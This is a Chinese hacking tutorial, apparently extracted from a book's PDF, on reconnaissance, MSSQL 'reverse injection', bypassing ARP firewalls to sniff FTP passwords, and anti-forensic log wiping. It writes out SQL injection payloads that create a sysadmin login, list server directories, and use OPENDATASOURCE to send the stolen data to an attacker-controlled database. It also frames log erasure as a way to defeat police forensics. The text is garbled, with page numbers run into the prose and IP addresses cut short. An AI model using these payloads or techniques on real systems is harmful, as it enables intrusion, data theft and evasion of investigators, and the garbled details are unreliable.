網(wǎng)絡(luò)攻防演練文檔設(shè)計(jì)

1、網(wǎng)絡(luò)攻防演練文檔設(shè)計(jì)目錄文獻(xiàn)參考：<<暗戰(zhàn)亮劍黑客滲透與防御全程實(shí)錄>>1.1 Web應(yīng)用程序滲透前的信息收集21.1.1了解目標(biāo)主機(jī)和網(wǎng)絡(luò)的一些基本的安全信息21.1.2確定目標(biāo)的域名和相關(guān)的網(wǎng)絡(luò)信息21.1.3目標(biāo)主機(jī)掃描測(cè)試31.2漏洞利用代碼的收集31.2.1腳本漏洞利用代碼的收集31.2.2 操作系統(tǒng)漏洞利用代碼的獲取41.3 MSSQL下的高級(jí)反彈注射技術(shù)41.3.1opendatasource函數(shù)語(yǔ)法51.3.2搭建本地MSSQL攻防環(huán)境61.3.3反彈注射之獲取機(jī)密信息61.4黑客致命絕招之突破ARP防火墻91.4.1Cain配合Ncpharp挑戰(zhàn)Ant

2、iarp防火墻91.5黑客反取證之痕跡擦除111.5.1操作系統(tǒng)常見(jiàn)日志111.5.2系統(tǒng)日志的擦除14 1.1 Web應(yīng)用程序滲透前的信息收集 腳本滲透是如今比較流行的技術(shù)，運(yùn)用該技術(shù)可輕松擊潰一個(gè)Web站點(diǎn)。不同安全級(jí)別的站點(diǎn)，滲透的方式也是不一樣的，其中涉及許多高級(jí)技巧。這些技巧都是黑客們的看家本領(lǐng)，一般是不愿意外傳的。這里筆者向讀者朋友揭秘高級(jí)腳本滲透技術(shù)的秘籍，重點(diǎn)學(xué)習(xí)高手們的滲透思路。1.1.1了解目標(biāo)主機(jī)和網(wǎng)絡(luò)的一些基本的安全信息踩點(diǎn)可以了解目標(biāo)主機(jī)和網(wǎng)絡(luò)的一些基本的安全信息，主要有：（1）.管理員聯(lián)系信息，電話號(hào)，傳真號(hào),QQ號(hào),電子郵件等。（2）.IP地址范圍（3）.DNS服

3、務(wù)器（4）.郵件服務(wù)器1.1.2確定目標(biāo)的域名和相關(guān)的網(wǎng)絡(luò)信息Whois查詢，通過(guò)Whois數(shù)據(jù)庫(kù)查詢可以得到以下的信息：（1）.注冊(cè)機(jī)構(gòu)：顯示相關(guān)的注冊(cè)信息和相關(guān)的Whois服務(wù)器（2）.機(jī)構(gòu)本身：顯示與某個(gè)特定機(jī)構(gòu)相關(guān)的所有信息（3）.域名：顯示與某個(gè)特定域名相關(guān)的所有信息（4）.網(wǎng)絡(luò)：顯示與某個(gè)特定網(wǎng)絡(luò)或單個(gè)IP地址相關(guān)的所有信息（5）.聯(lián)系點(diǎn):顯示與某位特定人員相關(guān)的所有信息1.1.3目標(biāo)主機(jī)掃描測(cè)試透過(guò)掃描可以獲取目標(biāo)主機(jī)的安全弱點(diǎn)以及漏洞信息，主要有：（1）.端口掃描，透過(guò)端口開(kāi)放情況可大致判斷提供的服務(wù)信息。（2）.漏洞掃描，可以獲取目標(biāo)主機(jī)存在的漏洞，比如溢出漏洞。（3）.密碼

4、破解，掃描工具可輕松的檢測(cè)出當(dāng)前系統(tǒng)的弱口令等信息。（4）.軟件漏洞，通過(guò)掃描也可發(fā)現(xiàn)一些軟件的漏洞，利用第三方軟件漏洞實(shí)現(xiàn)系統(tǒng)攻擊是目前比較流行的攻擊手法。1.2漏洞利用代碼的收集1.2.1腳本漏洞利用代碼的收集在國(guó)內(nèi)很多公司,企業(yè),教育,政府部門的網(wǎng)站程序都是使用網(wǎng)上公開(kāi)的商業(yè)程序或者免費(fèi)整站程序，一旦這些整站程序出現(xiàn)安全問(wèn)題，那么直接導(dǎo)致使用者的Web系統(tǒng)被攻擊或者被滲透。雖然利用現(xiàn)成的整站程序構(gòu)建網(wǎng)站系統(tǒng)成本較低，但是安全風(fēng)險(xiǎn)是無(wú)法回避的。在Web滲透中，黑客們常常遇到各種各樣的整站程序，不同的整站程序會(huì)出現(xiàn)不同的安全漏洞，掌握這些安全漏洞是很有必要的。在滲透需要的時(shí)候，這些漏洞就會(huì)起

5、到很大的作用。根據(jù)筆者的滲透經(jīng)驗(yàn)來(lái)談，收集一些Web程序敏感路徑,源碼,漏洞利用工具,0DAY程序等是非常重要的，不僅可以充實(shí)你的“漏洞庫(kù)”，而且可以對(duì)這些漏洞原理進(jìn)行分析，總結(jié)其中的精髓，做到融會(huì)貫通。這里是筆者近期收集的一些腳本漏洞利用程序，如圖1-1所示圖1-1 漏洞利用程序同時(shí)國(guó)內(nèi)比較出名的腳本程序漏洞公布站點(diǎn)Sebug，收集了海量國(guó)內(nèi)外整站程序的漏洞信息，國(guó)內(nèi)大多數(shù)整站程序漏洞信息在這里基本都能找到。其官方地址為： 如圖1-2所示圖1-2 sebug網(wǎng)站1.2.2 操作系統(tǒng)漏洞利用代碼的獲取當(dāng)然腳本漏洞利用程序只對(duì)存在腳本漏洞的Web站點(diǎn)構(gòu)成直接威脅，而對(duì)于滲透操作系統(tǒng)則需要更為高級(jí)

6、的漏洞利用程序。對(duì)操作系統(tǒng)而言，最為嚴(yán)重的莫過(guò)于遠(yuǎn)程溢出漏洞了，收集此類漏洞利用程序同樣也變得異常重要。一般來(lái)說(shuō)國(guó)外黑客站點(diǎn)會(huì)第一時(shí)間發(fā)布此類漏洞信息以及漏洞利用程序，關(guān)于獲取這類漏洞信息可查看如下站點(diǎn)：/其中黑客站點(diǎn)milw0rm通常是國(guó)外0DAY程序的第一發(fā)布站點(diǎn)，如圖1-3所示。圖1-3 miw0rm官網(wǎng)1.3 MSSQL下的高級(jí)反彈注射技術(shù)MSSQL注射攻擊是最為復(fù)雜的數(shù)據(jù)庫(kù)攻擊技術(shù)，由于該數(shù)據(jù)庫(kù)功能十分強(qiáng)大，存儲(chǔ)過(guò)程以及函數(shù)語(yǔ)句十分豐富，這些靈活的語(yǔ)句造就了新穎獨(dú)特的攻擊思路。黑客們深入鉆研MSSQL數(shù)據(jù)庫(kù)的精髓，將數(shù)據(jù)庫(kù)攻擊發(fā)揮得淋漓盡致。本

7、節(jié)筆者將繼續(xù)給讀者朋友講解MSSQL數(shù)據(jù)庫(kù)的一些高級(jí)攻擊技術(shù)，將SQL數(shù)據(jù)庫(kù)滲透發(fā)揮到極致。在嘗試進(jìn)行注射攻擊的時(shí)候，難免會(huì)遇到會(huì)這樣或者那樣的問(wèn)題。比如明明是SQL的注射點(diǎn)卻無(wú)法進(jìn)行注射,注射工具猜解的速度異常緩慢,錯(cuò)誤提示信息關(guān)閉,無(wú)法返回注射結(jié)果等，這些都是在注射攻擊中常常遇到的問(wèn)題。為了解決以上這些疑難雜癥，比較好的解決方法就是使用反彈注射技術(shù)，而反彈注射技術(shù)則需要依靠opendatasource函數(shù)支持。1.3.1opendatasource函數(shù)語(yǔ)法 學(xué)習(xí)任何技術(shù)，了解它的原理是非常重要的。只要把原理弄明白了，才能更好的研究和利用它。OPENDATASOURCE 函數(shù)可以在能夠使用鏈

8、接服務(wù)器名的相同 Transact-SQL 語(yǔ)法位置中使用。因此，就可以將 OPENDATASOURCE 用作四部分名稱的第一部分，該名稱指的是 SELECT、INSERT、UPDATE 或 DELETE 語(yǔ)句中的表或視圖的名稱；或者指的是 EXECUTE 語(yǔ)句中的遠(yuǎn)程存儲(chǔ)過(guò)程。當(dāng)執(zhí)行遠(yuǎn)程存儲(chǔ)過(guò)程時(shí)，OPENDATASOURCE 應(yīng)該指的是另一個(gè) SQL Server。OPENDATASOURCE 不接受參數(shù)變量。與 OPENROWSET 函數(shù)類似，OPENDATASOURCE 應(yīng)該只引用那些不經(jīng)常訪問(wèn)的 OLE DB 數(shù)據(jù)源。對(duì)于訪問(wèn)次數(shù)稍多的任何數(shù)據(jù)源，請(qǐng)為它們定義鏈接的服務(wù)器。無(wú)論 OP

9、ENDATASOURCE 還是 OPENROWSET 都不能提供鏈接的服務(wù)器定義的全部功能，例如，安全管理以及查詢目錄信息的能力。每次調(diào)用 OPENDATASOURCE 時(shí)，都必須提供所有的連接信息（包括密碼）。OPENDATASOURCE函數(shù)的語(yǔ)法參數(shù)如下：OPENDATASOURCE函數(shù)語(yǔ)法：OPENDATASOURCE ( provider_name, init_string )參數(shù)provider_name注冊(cè)為用于訪問(wèn)數(shù)據(jù)源的 OLE DB 提供程序的 PROGID 的名稱。provider_name 的數(shù)據(jù)類型為 char，沒(méi)有默認(rèn)值。init_string連接字符串，這些字符串將

10、要傳遞給目標(biāo)提供程序的 IDataInitialize 接口。提供程序字符串語(yǔ)法是以關(guān)鍵字值對(duì)為基礎(chǔ)的，這些關(guān)鍵字值對(duì)由分號(hào)隔開(kāi)，例如："keyword1=value; keyword2=value."下邊列出 init_string 參數(shù)中最常用的關(guān)鍵字：關(guān)鍵字 OLE DB 屬性 有效值和描述 數(shù)據(jù)源 DBPROP_INIT_DATASOURCE 要連接的數(shù)據(jù)源的名稱。不同的提供程序用不同的方法對(duì)此進(jìn)行解釋。對(duì)于 SQL Server OLE DB 提供程序來(lái)說(shuō)，這會(huì)指明服務(wù)器的名稱。對(duì)于 Jet OLE DB 提供程序來(lái)說(shuō)，這會(huì)指明 .mdb 文件或 .xls 文件的

11、完整路徑。 位置 DBPROP_INIT_LOCATION 要連接的數(shù)據(jù)庫(kù)的位置。 擴(kuò)展屬性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的連接字符串。 連接超時(shí) DBPROP_INIT_TIMEOUT 超時(shí)值，在該超時(shí)值后，連接嘗試將失敗。 用戶 ID DBPROP_AUTH_USERID 用于該連接的用戶 ID。 密碼 DBPROP_AUTH_PASSWORD 用于該連接的密碼。 目錄 DBPROP_INIT_CATALOG 連接到數(shù)據(jù)源時(shí)的初始或默認(rèn)的目錄名稱。關(guān)于OPENDATASOURCE函數(shù)更加詳細(xì)的信息，請(qǐng)參考“SQL SERVER聯(lián)機(jī)叢書”。為了比較形象的

12、說(shuō)明以上函數(shù)的用法，這里給出一個(gè)示例。該示例用于訪問(wèn)來(lái)自某個(gè)表的數(shù)據(jù)，該表在 SQL Server 的另一個(gè)實(shí)例中。SELECT *FROM OPENDATASOURCE( 'SQLOLEDB', 'Data Source=ServerName;User ID=MyUID;Password=MyPass' ).Northwind.dbo.Categories為了便于讀者朋友理解OPENDATASOURCE函數(shù)的功能，筆者使用較為通俗的語(yǔ)言來(lái)說(shuō)明：“使用OPENDATASOURCE函數(shù)將當(dāng)前數(shù)據(jù)庫(kù)中查詢的結(jié)果發(fā)送到另一數(shù)據(jù)庫(kù)服務(wù)器中”。這樣應(yīng)該比較容易理解。1.3

13、.2搭建本地MSSQL攻防環(huán)境 由于國(guó)家法律的要求，本節(jié)內(nèi)容將采用虛擬機(jī)本地模擬滲透環(huán)境進(jìn)行演示（注意：本地模擬和實(shí)際操作步驟完全一樣）。本地服務(wù)器版本均使用WindowS 2003 SP2，除了構(gòu)造帶注射漏洞的web服務(wù)器外，另外還需要在一主機(jī)上安裝SQL server2000數(shù)據(jù)庫(kù)環(huán)境。具體環(huán)境如下：漏洞主機(jī)環(huán)境：WindowS 2003 SP2+IIS6.0+ASP+ SQL server2000漏洞主機(jī)IP地址：08攻擊者主機(jī)環(huán)境：WindowS 2003 SP2+ SQL server2000攻擊者主機(jī)IP地址：03關(guān)于如何構(gòu)造有漏洞的注射

14、環(huán)境，已經(jīng)做過(guò)詳細(xì)介紹，不熟悉的朋友可以參考注射點(diǎn)偽造滲透一節(jié)的內(nèi)容。筆者構(gòu)造的注射鏈接如下：Http:/ 08/news.asp?id=10 以上漏洞鏈接采用DB_OWNER權(quán)限賬戶連接數(shù)據(jù)庫(kù)。1.3.3反彈注射之獲取機(jī)密信息 在MSSQL數(shù)據(jù)庫(kù)的滲透中，若想快速獲得webshell，采用差異備份的方式無(wú)疑是最快的，而如何獲取Web絕對(duì)路徑是一個(gè)關(guān)鍵，也是一個(gè)難點(diǎn)。對(duì)于獲取Web絕對(duì)路徑，已經(jīng)介紹過(guò)很多種方法。在這里筆者將補(bǔ)充一種使用反彈技術(shù)獲得絕對(duì)路徑的方法。1.首先應(yīng)該在攻擊者主機(jī)的SQL server 2000中建立一個(gè)具有管理權(quán)限的數(shù)據(jù)庫(kù)賬戶，具體命令如下：ex

15、ec master.dbo.sp_addlogin h4ck,h4ck;-exec master.dbo.sp_addsrvrolemember h4ck,sysadmin;-其中添加的用戶名為h4ck，密碼為h4ck。以上語(yǔ)句請(qǐng)?jiān)诓樵兎治銎髦袌?zhí)行，如圖1-4所示圖1-4 執(zhí)行添加用戶命令2.使用建立的SQL賬戶登陸數(shù)據(jù)庫(kù)，這里使用查詢分析器進(jìn)行連接。利用SQL語(yǔ)句建立一個(gè)數(shù)據(jù)庫(kù)以及表和字段等。具體命令如下：create database test-use test create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarc

16、har(255),num3 nvarchar(255)其中建立一個(gè)名叫test的庫(kù)，在test庫(kù)下建立temp表以及id,num1, num2, num3等字段用于存放數(shù)據(jù)。查詢分析器中執(zhí)行語(yǔ)句，如圖1-5所示圖1-5 創(chuàng)建數(shù)據(jù)庫(kù)表操作3.現(xiàn)在將視線轉(zhuǎn)移到注射點(diǎn)（漏洞主機(jī)）上來(lái)，同樣使用SQL語(yǔ)句在注射點(diǎn)上建立一個(gè)與攻擊者數(shù)據(jù)庫(kù)中temp表一模一樣的表段，以便稍后存放數(shù)據(jù)。在注射點(diǎn)執(zhí)行的命令如下:Http:/08/news.asp?id=10'create table temp(id nvarchar(255),num1 nvarchar(255),num2 nv

17、archar(255),num3 nvarchar(255)-由于我們是本地測(cè)試，可直接在漏洞主機(jī)上使用查詢分析器執(zhí)行。語(yǔ)句如下:create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)-如圖1-6所示圖1-6 創(chuàng)建temp表以下進(jìn)行的這二步非常關(guān)鍵，第一步將在漏洞主機(jī)進(jìn)行列目錄操作。在注射點(diǎn)執(zhí)行如下命令：Http:/08/news.asp?id=10'insert into temp(id,num1,num2) exec master.d

18、bo.xp_dirtree 'c:',1,1使用xp_dirtree過(guò)程遍歷c盤下的目錄以及文件名，最后將結(jié)果插入到temp表中。這里我們使用查詢分析器進(jìn)行執(zhí)行，執(zhí)行語(yǔ)句如下：insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'c:',1,1如圖1-7所示圖1-7 執(zhí)行語(yǔ)句現(xiàn)在該進(jìn)行第二步了，這一步尤為關(guān)鍵。利用OPENDATASOURCE函數(shù)將temp表中存放的數(shù)據(jù)發(fā)送至遠(yuǎn)程數(shù)據(jù)庫(kù)中，也就是發(fā)送到攻擊者構(gòu)造的數(shù)據(jù)庫(kù)中。在注射點(diǎn)執(zhí)行如下語(yǔ)句：Http:/08/news.asp

19、?id=10' insert into opendatasource('sqloledb','server=03,1433;uid=h4ck;pwd=h4ck;database=test').test.dbo.temp select * from temp-若在查詢分析器中，可執(zhí)行如下語(yǔ)句：insert into opendatasource('sqloledb','server=03,1433;uid=h4ck;pwd=h4ck;database=test').test.dbo

20、.temp select * from temp其中03為攻擊者數(shù)據(jù)庫(kù)服務(wù)器地址，1433為數(shù)據(jù)庫(kù)默認(rèn)端口，數(shù)據(jù)庫(kù)用戶名為h4ck,密碼為h4ck,庫(kù)名為test,要發(fā)送的內(nèi)容為temp表中的數(shù)據(jù)。如圖1-8所示圖1-8 發(fā)送temp表數(shù)據(jù)4.數(shù)據(jù)成功發(fā)送后，我們需要查看本地?cái)?shù)據(jù)庫(kù)中的temp表是否接收到了數(shù)據(jù)。在查詢分析器中執(zhí)行如下語(yǔ)句：Select * from temp -顯示temp表中所有的數(shù)據(jù)信息成功得到數(shù)據(jù)，如圖1-9所示圖1-9 得到機(jī)密數(shù)據(jù)通過(guò)以上的反復(fù)操作可找到Web的絕對(duì)路徑，記得在操作之前先清空temp表中的數(shù)據(jù)。1.4黑客致命絕招之突破ARP防火

21、墻內(nèi)網(wǎng)安全問(wèn)題是一個(gè)極為嚴(yán)峻的問(wèn)題，滲透者的各類攻擊技法層出不窮，難以防范，黑客時(shí)刻對(duì)企業(yè)網(wǎng)絡(luò)安全進(jìn)行嚴(yán)峻的考驗(yàn)。隨著Arp病毒的大規(guī)模爆發(fā)至今，企業(yè)一直飽受著Arp病毒的無(wú)情摧殘，所以為了加固局域網(wǎng)安全。企業(yè)都會(huì)選擇一些ARP防火墻作為自己的防護(hù)遁甲，經(jīng)過(guò)這樣簡(jiǎn)單的安全加固，能夠防御大多數(shù)的ARP攻擊，防御效率明顯提高。但是網(wǎng)絡(luò)攻擊與安全防御都是對(duì)立發(fā)展的，相互推動(dòng)。網(wǎng)絡(luò)沒(méi)有絕對(duì)的安全，黑客們已經(jīng)找到如何突破ARP防火墻的高級(jí)技術(shù)了，這一高級(jí)技術(shù)使得ARP防火墻形同虛設(shè)。下面筆者以實(shí)例的方式詳細(xì)講解如何在內(nèi)網(wǎng)滲透中對(duì)ARP防火墻的突破。1.4.1Cain配合Ncpharp挑戰(zhàn)Antiarp防

22、火墻對(duì)于滲透軟件軟件防火墻，其實(shí)可以通過(guò)增加ARP包的發(fā)送速度，數(shù)據(jù)包的發(fā)送速度一定要比arp防火墻的速度快，告訴網(wǎng)關(guān)攻擊者是被欺騙的主機(jī)ip地址和Mac地址，由于特定發(fā)包工具的速度比arp防火墻快，網(wǎng)關(guān)應(yīng)對(duì)攻擊者的響應(yīng)包要多一些，這樣自然就把我當(dāng)成被欺騙的主機(jī)了。對(duì)于特定發(fā)包工具，筆者建議使用NCPH工作室出品的【ncpharp】。關(guān)于測(cè)試的環(huán)境，這里可以沿用前面配置的環(huán)境。首先開(kāi)啟Antiarp防火墻，將【防御狀態(tài)】調(diào)整至【警戒-待命】。如圖1-10所示圖1-10將【防御狀態(tài)】調(diào)整至【警戒-待命】使用Cain對(duì)目標(biāo)主機(jī)06進(jìn)行ARP嗅探測(cè)試，如圖1-11所示圖1-11

23、 ARP嗅探測(cè)試本地使用賬戶以及密碼成功登陸FTP服務(wù)器，查看Antiarp防火墻狀態(tài)。發(fā)現(xiàn)已經(jīng)攔截到了多次ARP攻擊。如圖1-12所示圖1-12 攔截到攻擊數(shù)據(jù)包查看CAIN嗅探狀態(tài)，結(jié)果沒(méi)有嗅探到登陸的FTP密碼。如圖1-13所示圖1-13 無(wú)任何嗅探數(shù)據(jù)要想成功ARP嗅探必須配合一款特定的發(fā)包工具，由于特定工具發(fā)包速度較快，筆者建議單獨(dú)用一臺(tái)計(jì)算機(jī)運(yùn)行發(fā)包工具。在使用發(fā)包工具之前，需要配置一些基本信息。所需基本信息如下：網(wǎng)關(guān)ip地址以及MAC地址：00-25-86-3d-9b-96目標(biāo)主機(jī)ip地址以及MAC地址：0600-0C-29-54-7E

24、-BB選擇發(fā)包的網(wǎng)卡【Ncpharp】在使用前請(qǐng)確保安裝了【W(wǎng)inPcap】軟件，否則無(wú)法運(yùn)行?！綨cpharp】基本配置情況，如圖1-14所示圖1-14 【Ncpharp】基本配置現(xiàn)在開(kāi)啟Cain對(duì)目標(biāo)進(jìn)行ARP嗅探測(cè)試，發(fā)現(xiàn)能夠成功嗅探到FTP密碼。如圖1-15所示圖1-15 嗅探到FTP明文數(shù)據(jù)包1.5黑客反取證之痕跡擦除一個(gè)成功的滲透者不僅具有高超的入侵技術(shù),而且還需要具有良好的反偵察意識(shí)，在完成對(duì)特定目標(biāo)的滲透后能做到全身而退，不留下任何痕跡，做到“來(lái)無(wú)影，去無(wú)蹤”。 同時(shí)在撤退的過(guò)程中需要做大量的后期工作，清理掉在系統(tǒng)中所留下的一切痕跡，如果這個(gè)過(guò)程按照技術(shù)分類來(lái)劃分的話，它屬于計(jì)

25、算機(jī)反取證技術(shù)。計(jì)算機(jī)反取證就是刪除或者隱藏入侵證據(jù)使取證工作無(wú)效。目前的計(jì)算機(jī)反取證技術(shù)主要有數(shù)據(jù)擦除、數(shù)據(jù)隱藏、數(shù)據(jù)加密等。數(shù)據(jù)擦除是最有效的反取證方法，它是指清除所有可能的證據(jù)（包括索引節(jié)點(diǎn)、目錄文件和數(shù)據(jù)塊中的原始數(shù)據(jù)等），原始數(shù)據(jù)不存在了，取證工作自然無(wú)法進(jìn)行，嚴(yán)重阻礙網(wǎng)絡(luò)警察的犯罪取證。同時(shí)對(duì)于計(jì)算機(jī)取證人員來(lái)說(shuō)，研究反取證技術(shù)有特別的意義，不僅可以了解入侵者有哪些常用手段用來(lái)掩蓋甚至擦除入侵痕跡，而且可以在這些手段的基礎(chǔ)上，開(kāi)發(fā)出更加有效、實(shí)用、針對(duì)性極強(qiáng)的計(jì)算機(jī)取證工具。1.5.1操作系統(tǒng)常見(jiàn)日志 日志文件是操作系統(tǒng)比較特別的文件，默默地記錄著系統(tǒng)發(fā)生的一切事件。這些普通的日志

26、文件平常毫不起眼，顯得微不足道。但是一旦發(fā)生安全事件，這些日志就成了最寶貴的數(shù)據(jù)，計(jì)算機(jī)取證人員會(huì)提取其中的關(guān)鍵日志進(jìn)行分析，分析攻擊者在系統(tǒng)中進(jìn)行的各項(xiàng)操作，最后將這些信息整理出來(lái)成為控告攻擊者最有說(shuō)服力的犯罪證據(jù)。由此可以看出日志在計(jì)算機(jī)安全中顯示了無(wú)可替代的作用。如果要擦除這些痕跡，攻擊者必須熟悉操作系統(tǒng)中的日志相關(guān)的知識(shí)。1. 系統(tǒng)自帶日志系統(tǒng)自帶日志也是非常重要的日志，計(jì)算機(jī)取證人員通常會(huì)從這里下手提取一些數(shù)據(jù)。系統(tǒng)自帶日志分為三類日志，具體如下:應(yīng)用程序日志：記錄了重要的應(yīng)用程序產(chǎn)生的錯(cuò)誤和成功信息。安全日志：主要記錄著win2k操作系統(tǒng)的組件所產(chǎn)生的日志。系統(tǒng)日志：主要記錄審核策

27、略的日志。關(guān)于如何查看系統(tǒng)日志，可依次作如下操作：“開(kāi)始-設(shè)置控制面板-管理工具-事件查看器”。如圖1-16所示圖1-16事件查看器比如我們想查看是否被非法攻擊者遠(yuǎn)程登陸過(guò)系統(tǒng)，可在事件查看器（本地）列表中選擇“安全性” ，系統(tǒng)就會(huì)詳細(xì)顯示所有的登陸事件。如圖1-17所示圖1-17 詳細(xì)顯示所有的登陸事件可以根據(jù)時(shí)間或者登陸用戶來(lái)判斷用戶登陸的事件，事件中顯示了一個(gè)名叫hacker$的用戶嘗試登陸過(guò)系統(tǒng)，有經(jīng)驗(yàn)的管理一看就知道有貓膩。選擇此賬戶，右鍵選擇“屬性”可查看更多關(guān)于此賬戶的信息。如圖1-18所示圖1-18 查看更多關(guān)于此賬戶的信息事件詳細(xì)信息顯示：“該用戶已經(jīng)成功登陸，并且登陸服務(wù)器

28、所使用的IP地址為04。”這可以確定系統(tǒng)被入侵了，而且知道攻擊者的IP地址，如果攻擊者使用的真實(shí)的IP地址的話，那么他很危險(xiǎn)，因?yàn)樗雎粤讼到y(tǒng)日志對(duì)他構(gòu)成的威脅。2. 服務(wù)器日志除了以上系統(tǒng)自帶的基本日志外，服務(wù)器日志也是相當(dāng)?shù)闹匾渲性敿?xì)記錄了網(wǎng)絡(luò)用戶對(duì)服務(wù)器資源的訪問(wèn)事件。服務(wù)器日志主要分為三類日志，具體如下:IIS日志：用于記錄網(wǎng)絡(luò)用戶活動(dòng)的細(xì)節(jié)信息。FTP日志：用于記錄著所有用戶的訪問(wèn)信息。DNS日志：用于記錄DNS活動(dòng)相關(guān)的事件信息。 目前網(wǎng)絡(luò)上普遍使用微軟的IIS作為網(wǎng)站的服務(wù)器，通常Web服務(wù)器最容易受到腳本黑客們的襲擊，IIS日志顯得格外重要，其中詳細(xì)記

29、錄了網(wǎng)絡(luò)用戶的活動(dòng)信息。一般網(wǎng)站被黑客入侵，可通過(guò)分析IIS日志，找出攻擊者的IP地址。關(guān)于如何查看IIS日志，可依次作如下操作：開(kāi)始-設(shè)置控制面板-管理工具-Internet 信息服務(wù)(IIS)管理器-網(wǎng)站屬性-啟用日志記錄-屬性 如圖1-19所示 圖1-19 日志記錄屬性其中包含了日志的記錄任務(wù)和日志的存放路徑，打開(kāi)該路徑下的W3SVC1目錄，可看到IIS相關(guān)的日志信息。其中日志默認(rèn)按天進(jìn)行記錄的，比如我們要查看今天的日志，可直接雙擊日志文件“ex090711.log”（注意：今天是2009年7月11日），日志記錄了詳細(xì)的訪問(wèn)信息。如圖1-20所示圖1-20日志記錄了詳細(xì)的訪問(wèn)信息由圖1-

30、20可知一陌生IP為17的用戶向服務(wù)器發(fā)送過(guò)大量的請(qǐng)求，其中請(qǐng)求的頁(yè)面都是網(wǎng)站的敏感路徑，而且發(fā)送的請(qǐng)求速度非?？欤止な菬o(wú)法達(dá)到這樣的速度，筆者可以斷定攻擊者使用的黑客掃描器進(jìn)行探測(cè)的。由以上信息可以判斷服務(wù)器在今天曾遭受過(guò)黑客的攻擊。如果沒(méi)有IIS日志記錄，取證人員很難判斷攻擊者所處的位置。對(duì)于FTP日志和DNS日志的查看都是大同小異的，這里不再介紹。3. 系統(tǒng)防火墻日志通常防火墻是攔截外邊攻擊的第一道屏障，防火墻不僅可以阻擋攻擊，而且對(duì)外部計(jì)算機(jī)嘗試攻擊的事件會(huì)詳細(xì)記錄在案，此工作通常交給日志來(lái)做，由此可見(jiàn)日志同樣扮演了相當(dāng)重要的作用。如何查看防火墻日志，可依次作如下操作：網(wǎng)上鄰居-屬性-更改WindowS防火墻設(shè)置-選擇“高級(jí)”選項(xiàng)卡-安全日志記錄-設(shè)置 如圖1-21所示圖1-21 日志設(shè)置記錄選項(xiàng)中記錄被丟棄的數(shù)據(jù)包和成功的連接的數(shù)據(jù)包，以及防火墻日志的存放路徑和文件大小限制等信息。防火墻安全日志使用的格式為W3C擴(kuò)展日志文件格式，可直接使用記事本打開(kāi)。如圖1-22所示圖1-22 打開(kāi)防火墻日志文件一般防火墻的日志容量比較大，筆者建議使用專業(yè)的日志分析軟件進(jìn)行分析。4. 系統(tǒng)終端登陸日志